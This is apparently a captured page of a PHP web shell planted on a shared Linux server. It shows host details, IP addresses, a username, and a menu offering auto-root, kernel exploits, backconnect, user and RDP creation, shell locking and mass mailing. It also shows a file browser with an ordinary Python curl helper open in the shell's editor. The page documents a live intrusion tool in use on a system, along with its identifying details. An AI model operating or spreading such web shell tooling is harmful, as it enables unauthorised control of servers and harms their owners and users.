Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
local /
bin /
dhwp /
dhwp /
core /
[ HOME SHELL ]
Name
Size
Permission
Action
__pycache__
[ DIR ]
drwxr-xr-x
__init__.py
0
B
-rw-rw-r--
curl.py
546
B
-rw-rw-r--
exc.py
64
B
-rw-rw-r--
git.py
2.76
KB
-rw-rw-r--
version.py
176
B
-rw-rw-r--
wordpress.py
5.17
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : curl.py
import re import sys import os from cement import shell from cement.utils.misc import minimal_logger LOG = minimal_logger(__name__) def fetch(url, dest_path): out, err, code = shell.cmd('which curl') if code > 0: LOG.fatal("cannot find curl, please install it first") sys.exit(1) command = "curl -s -L -o %s %s" % (dest_path, url) LOG.debug("fetch command : %s" % command) out, err, code = shell.cmd(command) if code > 0: LOG.fatal("curl failed : (%s) (%s)" % (out, err)) sys.exit(1)
Close